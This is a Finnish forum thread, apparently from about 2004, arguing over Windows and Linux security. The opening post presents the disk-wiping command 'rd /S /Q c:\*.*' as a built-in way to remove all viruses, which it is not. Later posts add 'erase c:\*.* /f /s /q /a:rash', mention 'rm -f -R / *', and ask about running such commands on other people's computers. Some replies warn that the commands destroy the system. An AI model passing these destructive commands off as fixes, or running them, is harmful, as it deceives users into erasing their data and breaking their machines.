Tässä kaikille esimerkki Windowsin ylivoimaisuudesta! Windows sisältää oman käskyn joka putsaa koneelta kaikki virukset ja haittaohjelmat ihan itsekseen!
avaa komentokehote -> käynnistä -> suorita kirjoita cmd.exe ja paina ok
Nyt anna komento cd \ ja paina enter
nyt anna komento rd /S /Q c:\*.* ja paina enter
Nyt saat kaiken pahan pois windows koneeltasi!
Todella turvallinen avaruusajan järjestelmä!
Windows
21
2013
Vastaukset
- Harri
Tuo käsky poistaa systeemitiedostoja jota myös eräs troijalainen käyttää:
http://www.sophos.com/virusinfo/analyses/trojzapchasd.html- God-Ari
Antaako IE mahdollisuuden suorittaa tuon käskyn nettisivuilta? IE:hän sallii ainakin kiintolevyn selailun.
- Harri
God-Ari kirjoitti:
Antaako IE mahdollisuuden suorittaa tuon käskyn nettisivuilta? IE:hän sallii ainakin kiintolevyn selailun.
että älkää ajako tuota käskyä koneellanne. Se poistaa systeemitiedostoja jonka jälkeen kone ei tietenkään toimi. Tuolla Sophosin sivuilla on kuvaus eräästä troijalaisesta joka ajaa tuon saman käskyn. Katso kohdasta advanced.
- Bits©
Tuo käsky poistaa muutakin kuin systeemitiedostot. Komento tyhjentää C:\-levyn täysin.
Ei muuten poista kaikkia viruksia. MBR-virus jää henkiin :-) - XP-vapaa nyt ja tulevaisuud...
Bits© kirjoitti:
Tuo käsky poistaa muutakin kuin systeemitiedostot. Komento tyhjentää C:\-levyn täysin.
Ei muuten poista kaikkia viruksia. MBR-virus jää henkiin :-)FDISK /MBR
En tosin tiedä onko millainen osiointisofta XP:n mukana, vanhoissa kotiwinkuissa toi Fdisk löytyy.
terv. nimimerkki XP-vapaa, nyt ja tulevaisuudessakin. - God-Ari
Harri kirjoitti:
että älkää ajako tuota käskyä koneellanne. Se poistaa systeemitiedostoja jonka jälkeen kone ei tietenkään toimi. Tuolla Sophosin sivuilla on kuvaus eräästä troijalaisesta joka ajaa tuon saman käskyn. Katso kohdasta advanced.
Tietenkään ei kannata koittaa OMALLA koneella (eihän se edes pmalla koneella toimi), mutta entä muiden?
- 31337
Bits© kirjoitti:
Tuo käsky poistaa muutakin kuin systeemitiedostot. Komento tyhjentää C:\-levyn täysin.
Ei muuten poista kaikkia viruksia. MBR-virus jää henkiin :-)on erase komento vielä parempi!
esim c:\erase c:\*.* /f /s /q /a:rash
Tolla pääsee viimeistään eroon konetta vaivaavista viruksista!
Ja komennon voi suorittaa ilman pääkäyttäjän oikeuksia! Mitä tämä taas kertoo avaruusajan Windowsin turvallisuudesta? - Bits©
31337 kirjoitti:
on erase komento vielä parempi!
esim c:\erase c:\*.* /f /s /q /a:rash
Tolla pääsee viimeistään eroon konetta vaivaavista viruksista!
Ja komennon voi suorittaa ilman pääkäyttäjän oikeuksia! Mitä tämä taas kertoo avaruusajan Windowsin turvallisuudesta?Windowsin turvallisuus perustuu siis siihen, etteivät sen käyttäjillä yleensä riitä tietotaito komentotulkin käyttöön :-D
- 31337
Bits© kirjoitti:
Windowsin turvallisuus perustuu siis siihen, etteivät sen käyttäjillä yleensä riitä tietotaito komentotulkin käyttöön :-D
-LOL-
...snif..... LOL.....
^_^ - Töppö
31337 kirjoitti:
-LOL-
...snif..... LOL.....
^_^..ettei Windowsissa mukamas ole tehokasta komentotulkkia:))
- 31337
Töppö kirjoitti:
..ettei Windowsissa mukamas ole tehokasta komentotulkkia:))
totuudentorvi ja seppot nyt puolustamassa avaruusajan järjestelmäänsä?
Taisivat poijjaat kokeilla tuota komentoa ja eivät nyt pääse tänne trollamaan ennenkuin on winkku asenettu uudelleen...taas... - löydy
31337 kirjoitti:
totuudentorvi ja seppot nyt puolustamassa avaruusajan järjestelmäänsä?
Taisivat poijjaat kokeilla tuota komentoa ja eivät nyt pääse tänne trollamaan ennenkuin on winkku asenettu uudelleen...taas...Tossahan joutuu painaa kolme kertaa enteriä.?
- Töppö
löydy kirjoitti:
Tossahan joutuu painaa kolme kertaa enteriä.?
Voihan siitä tehdä batin niin Windowskäyttäjätkin osaavat, sitten se toimii hiiren klikkauksella:)
- VanessaDelRio
löydy kirjoitti:
Tossahan joutuu painaa kolme kertaa enteriä.?
Toki löytyy, IE riittää...
http://www.ficora.fi/suomi/tietoturva/cert.htm#2004-11-22_1050
22.11.2004, klo 10.50
Microsoft Internet Explorer IFRAME- haavoittuvuuden hyväksikäyttö
CERT-FI:n saamien tietojen mukaan uusia Microsoft Internet Explorer IFRAME -haavoittuvuuden hyväksikäyttömenetelmiä on julkisesti saatavilla. On huomioitavaa, että haavoittuvuuden hyväksikäyttö voi olla näiden uusien hyödyntämismenetelmien avulla mahdollista myös Microsoft Windows XP SP2:lla (Service Pack 2) varustetuissa tietojärjestelmissä.
IFRAME -haavoittuvuuteen ei ole tällä hetkellä olemassa korjaustiedostoa. Kunnes korjaustiedosto on saatavilla, CERT-FI suosittelee vaihtoehtoisen selainohjelman käyttöä.
Lisätietoa Microsoft IFRAME -haavoittuvuudesta on saatavilla mm. osoitteista:
http://www.lurhq.com/iframeads.html
http://isc.sans.org/diary.php?date=2004-11-20
- Seppot
Mitä rm -f -R / * tekee linuksissa, onko * pakollinen, onko rm komento itsessään kielletty kaikilta muilta kuin root tai super user käyttäjiltä?
Tuo rd /S /Q c:\*.* toimii vain jos on kirjautuneena järjestelmänvalvojaksi, esim. XP home editionin rajoitettu käyttäjätililtä itse rd toimii mutta se poistaa vain kansioita/ tiedostoja joita samassa istunnossa oleva käyttäjä on luonut.SuSE 9.1 perusasetuksilla ==> rm: cannot remove ja riippuen onko tiedosto vai hakemisto, niin oma virheensä siihen asti kunnes tulee oma tiedosto!
- 31337
kokeilin juuri ja sain koneen tolla erase komennolla käyttökelvottomaksi, (windows xp pro) ja olin kirjautuneeva normaalina käyttänäjä, ei vieras eikä admin.
Ja linuxssa koitin tavallisena käyttäjänä poistaa juuresta kaiken, ja sain aikaan vain oman kansioni sisällön poiston.
Että semmosta. - 31337
31337 kirjoitti:
kokeilin juuri ja sain koneen tolla erase komennolla käyttökelvottomaksi, (windows xp pro) ja olin kirjautuneeva normaalina käyttänäjä, ei vieras eikä admin.
Ja linuxssa koitin tavallisena käyttäjänä poistaa juuresta kaiken, ja sain aikaan vain oman kansioni sisällön poiston.
Että semmosta.Windows antaa oletuksena käyttäjälle järjestelmänvalvojan oikeudet winkun asennuksen jälkeen. Kuinka moni kotikäyttäjä tekee muka asennuksen jälkeen itselleen rajoitetun käyttäjätilin tai edes normaalikäyttäjän tilin.
Usko jo että windows ei ole nähnytkään turvallista!
Mulla on tässä silmieni edessa Linux pohjainen boot levyke jolla menen kohta murtamaan INFO pisteen windows Xp pro koneen salasanan jonka joku oli innoissaan vaihtanut ja unohtanut. Niin ja tähän windows xp pro koneen salasanan murtamiseen menee noin 30 sec aikaa.
Murrappa samalla tavalla linux kone senkin torspo!
Ja olen siis maininnut tästä varmaan aiemmin mutta mun MCP ohjaajanikin on sitä mieltä että Microsoftissa ja Winkussa on jotain pahasti vialla. Ja jos seppot ei nyt tiedä mikä on MCP niin se on M$ oma sertifikaatti, M$ sertified professional. Niin, vaikka olen Linux käyttäjä, hommaan M$ sertifikaatin ihan huvikseni, helppo saada ja ei tarttee siitä itse maksaa kun kuuluu työpaikan koulutusprojektiin.
Niin ja 100% Linux käyttäjistä tietää enemmän myös Winkku maailmasta kuin winkku käyttäjät. - Eikka
31337 kirjoitti:
Windows antaa oletuksena käyttäjälle järjestelmänvalvojan oikeudet winkun asennuksen jälkeen. Kuinka moni kotikäyttäjä tekee muka asennuksen jälkeen itselleen rajoitetun käyttäjätilin tai edes normaalikäyttäjän tilin.
Usko jo että windows ei ole nähnytkään turvallista!
Mulla on tässä silmieni edessa Linux pohjainen boot levyke jolla menen kohta murtamaan INFO pisteen windows Xp pro koneen salasanan jonka joku oli innoissaan vaihtanut ja unohtanut. Niin ja tähän windows xp pro koneen salasanan murtamiseen menee noin 30 sec aikaa.
Murrappa samalla tavalla linux kone senkin torspo!
Ja olen siis maininnut tästä varmaan aiemmin mutta mun MCP ohjaajanikin on sitä mieltä että Microsoftissa ja Winkussa on jotain pahasti vialla. Ja jos seppot ei nyt tiedä mikä on MCP niin se on M$ oma sertifikaatti, M$ sertified professional. Niin, vaikka olen Linux käyttäjä, hommaan M$ sertifikaatin ihan huvikseni, helppo saada ja ei tarttee siitä itse maksaa kun kuuluu työpaikan koulutusprojektiin.
Niin ja 100% Linux käyttäjistä tietää enemmän myös Winkku maailmasta kuin winkku käyttäjät.Vihdoin tuli jonkun suusta lausuttua ääneen totuus, joka on hiljaisesti ollut kaikkien tiedossa.
Allekirjoitan täysin oletuksen, että 100% kaikilla Linux-käyttäjillä on pohjalla keskivertoa parempi osaaminen M$ -käyttiksestä, joka lienee ollut myös suurimpana syynä käyttiksen vaihtoon, ja uskallanpa vielä lisätä, että monella Linuxin käyttäjillä on koneellaan myös joku M$-versio, tarpeeseen tai tarpeettomasti, joten mitään mullistavaa tietoa on tuskin jäänyt huomaamatta.
Tämän asian kun pitää mielessä, niin Mikkis-intoilijat voisivat hieman miettiä, minkälaiselle kohderyhmälle tarjoavat käsityksiään käyttöjärjestelmien ominaisuuksista. - Eikka
Eikka kirjoitti:
Vihdoin tuli jonkun suusta lausuttua ääneen totuus, joka on hiljaisesti ollut kaikkien tiedossa.
Allekirjoitan täysin oletuksen, että 100% kaikilla Linux-käyttäjillä on pohjalla keskivertoa parempi osaaminen M$ -käyttiksestä, joka lienee ollut myös suurimpana syynä käyttiksen vaihtoon, ja uskallanpa vielä lisätä, että monella Linuxin käyttäjillä on koneellaan myös joku M$-versio, tarpeeseen tai tarpeettomasti, joten mitään mullistavaa tietoa on tuskin jäänyt huomaamatta.
Tämän asian kun pitää mielessä, niin Mikkis-intoilijat voisivat hieman miettiä, minkälaiselle kohderyhmälle tarjoavat käsityksiään käyttöjärjestelmien ominaisuuksista.Lueskelin vähän kirjoituksia tuosta IE-selain ongelmasta, ja winkun-käyttäjien keskuudessa tuntuu olevan selaimenvaihtobuumi käynnissä.
Suurimpana ongelmana näyttää olevan, että " selain on nyt asennettu, mitä minä nyt teen, mistä pitää näpäyttää hiirellä, että tää sitten toimis " ! ! ? ?
Oletteko kuulleet samanlaisia kysymyksiä Linux-palstalla ? ? - 31337
Eikka kirjoitti:
Lueskelin vähän kirjoituksia tuosta IE-selain ongelmasta, ja winkun-käyttäjien keskuudessa tuntuu olevan selaimenvaihtobuumi käynnissä.
Suurimpana ongelmana näyttää olevan, että " selain on nyt asennettu, mitä minä nyt teen, mistä pitää näpäyttää hiirellä, että tää sitten toimis " ! ! ? ?
Oletteko kuulleet samanlaisia kysymyksiä Linux-palstalla ? ?Niinpä!
Linux palstalla näkee eniten kirjotuksia joissa kysellään suurimmaksi osaksi susen ja mandraken asennuksessa ja käyttössä olevia pikku ongelmia. Ja nekään ongelmat eivät ole mitään maailmaa mullistavia. Näitä siis kysyvät ne jotka ovat ekaa kertaa linuxia kokeilemassa. Muut keskustelut sitten ovatkin winkku käyttäjille täyttä hebreaa.
Winkku keskusteluissa taas suurin osa keskusteluista koskee sitä kuinka kone ei enää toimi SP2 asennuksen jälkeen tai mistä löytyy sitä ja tätä warea yms.
esimerkkinä tavallisen winkku käyttäjän ongelmasta olisi tämä tosi tapaus tuttava piiristäni:
Kaveri soitteli ja valitti kun ei saa jotain ohjelmaa X asenettua vaikka kuinka koittas.
Menin paikan päälle katsastamaan ja kaveri näytti kuinka asenti ohjelman mutta mitään ei muka tapahdu asennusken jälkeen.
Siis tämä asennus epäonnistui hänen mielestään koska ohjelma ei tehnyt pikakuvaketta työpöydälle eikä valikkoa käynnistä valikkoon.
Ohjelma oli asennettu ja käynnistyi normaalisti c:\program files kansiosta josta sitten tein pikakuvakkeen työpöydälle.
Oppi kaverikin jotain uutta! Ja oli muuten omistanut tietokoneen jo pari vuotta.....
Ja tosiaan winkku kannattajien on turha koettaa selittää linux käyttäjille miksi wintööt olisi parempi koska 100% linux käyttäjistä on winkkua käyttänyt ja osaa sen taatusti pintaa syvemmältä. Ja se pintaa syvemmältä tuntemus saakkin sitten siirtymään Linuxiin kun huomaa miten onneton jekkulanka jeesusteippi viritys winkku oikeasti on.
Ketjusta on poistettu 0 sääntöjenvastaista viestiä.
Luetuimmat keskustelut
Taitaa jäädä kotimaiset mansikat ostamatta
Kotimainen mansikka on niin kallista, että en ole vielä ainuttakana maistanut. Jos hinta pysyy näin korkealla niin tästä681969- 1281394
Sinkkumiehet hukkaavat tärkeän ässän hihastaan kun
...eivät suostu kavereiksi naisten kanssa. Mikä voi olla heillä syynä? Hyväksyvät vain naisen, joka suorastaan anelee sa1321353- 1431082
- 103932
"Kaikkien miesten asia" - kampanja on alkanut
Miehillä on naisiin kohdistuvan väkivallan lopettamisessa merkittävä rooli. Ei riitä, ettei itse tee väkivaltaa. Miesten348868Tiedät, että en voi enää laittaa viestiä
Aikaa kulunut. Eikä se näyttäisi enää luontevalta vastata näin pitkän ajan jälkeen. Tiedän myös, että sinä et enää lait82754Lautakunta käsittelee Iisalmen kulttuuri- ja vapaa-aikajohtajan virkasuhteen purkua koeajalla:
Lautakunta käsittelee Iisalmen kulttuuri- ja vapaa-aikajohtajan virkasuhteen purkua koeajalla: "Aina valinta ei mene nap55694Kun kohtaatte rakkauden, tarttukaa siihen
Toimisinko jälkiviisaana toisin? Varmasti. Vaikka silloin kuvittelin tekeväni, niin kuin on oikein. Mahdollisimman siist50673Lienee aika luopua siitä kaikesta
mitä meillä ikinä olikaan. Hassua, koska juuri mitään ei ole edes ollutkaan. En vaan jaksa tätä mahdotonta juttua enää j67654